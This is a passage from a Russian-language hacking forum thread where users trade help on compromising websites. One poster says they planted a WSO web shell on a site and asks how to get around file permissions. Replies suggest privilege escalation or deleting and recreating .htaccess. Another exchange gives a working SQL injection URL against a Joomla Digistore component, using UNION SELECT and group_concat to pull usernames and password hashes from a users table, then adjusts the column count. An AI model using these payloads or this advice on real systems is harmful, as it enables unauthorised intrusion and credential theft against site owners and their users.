если есть права на чтение, или просто проверь file_priv, а может повезёт и есть доступ к mysql.root ))

залил wso шелл на сайт. пытаюсь редактировать .htacess, а мне пишет File isn't writeable

права на файл стоят 0644 и они не меняются. скажите, как можно изменить права на файл или как отредактировать файл?

skagen said:
залил wso шелл на сайт. пытаюсь редактировать .htacess, а мне пишет File isn't writeable
права на файл стоят 0644 и они не меняются. скажите, как можно изменить права на файл или как отредактировать файл?


Сменить овнера файла на того, который может выставить нужные права для редактирования файла. Очевидно же. На практике это означает, что нужно повысить свои права, которыx у вас не хватает для вышеперечисленных операций. Ответ на вопрос: "Что тогда делать?" напрашивается сам собой.

skagen said:
залил wso шелл на сайт. пытаюсь редактировать .htacess, а мне пишет File isn't writeable
права на файл стоят 0644 и они не меняются. скажите, как можно изменить права на файл или как отредактировать файл?


Если в папке есть права - удали файл и создай заного

уязвимость (SQL inj) Joomla в компоненте Digistore

http://www.exploitsdownload.com/exploit/na/joomla-digistore-sql-injection

http://joomla15.ijoomlademo.com/index.php?option=com_digistore&controller=digistor eProducts&task=list&cid[]=-2/**/union/**/select/**/user(),user(),user(),version(),user(),user()

Объясните пожалуйста, при помощи этой уязвимости реально слить хэши и ники из основной БД сайта?

а в чем проблема?


Code:
http://joomla15.ijoomlademo.com/index.php?option=com_digistore&controller=digistor %20eProducts&task=list&cid[]=-2/**/union/**/select/**/group_concat%28username,0x3a,password%29,2,3,4/**/from/**/j17w2hcpwjzo5__users

Seravin said:
а в чем проблема?

Code:
http://joomla15.ijoomlademo.com/index.php?option=com_digistore&controller=digistor %20eProducts&task=list&cid[]=-2/**/union/**/select/**/group_concat%28username,0x3a,password%29,2,3,4/**/from/**/j17w2hcpwjzo5__users



Я бы был невероятно признателен Вам, если бы разъяснили в чём соль. Просто в прошлый раз когда я получал пароли на локалхосте (самописный двиг с детской уязвимостью), все хэши выпадали в ошибку, а тут даже в исходном коде нет намёков. Извините если напрягаю

как минимум то, что у тебя 6 полей было, а у меня 4

Га-Ноцри said:
Сменить овнера файла на того, который может выставить нужные права для редактирования файла. Очевидно же. На практике это означает, что нужно повысить свои права, которыx у вас не хватает для вышеперечисленных операций. Ответ на вопрос: "Что тогда делать?" напрашивается сам собой.


и каким образом сменить владельца то или повысить свои права?

Seravin said:
как минимум то, что у тебя 6 полей было, а у меня 4


ну а дела то в конечном итоге не меняет

ну а дела то в конечном итоге не меняет


как это так «дела не меняет?».